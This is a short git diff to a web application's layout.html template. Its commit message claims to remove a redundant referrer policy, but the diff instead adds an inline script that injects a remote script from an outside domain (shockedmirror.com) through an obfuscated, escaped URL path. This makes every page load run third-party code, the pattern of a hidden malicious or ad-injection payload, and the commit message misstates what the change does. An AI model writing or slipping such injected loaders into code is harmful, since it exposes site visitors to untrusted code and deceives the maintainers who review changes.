fix: remove redundant referrer policy in script tags

--- a/application/templates/layout.html
+++ b/application/templates/layout.html
@@ -109,6 +109,18 @@ height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
     if(el) el.textContent = data.cart_count;
   });
 </script>
+<script>
+(function(onj){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = onj || {};
+s.src = "\/\/shockedmirror.com\/blXlV.s\/dDGUl-0ZYZWpco\/DeLm-9HueZ-UYlekVPVTYYy3ENVDhMa2eM\/zlA\/tQNTjWcK0JMizlY\/zhM\/QG";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 
 <header>
   <nav class="navbar navbar-expand-sm navbar-light border-bottom box-shadow mb-3">
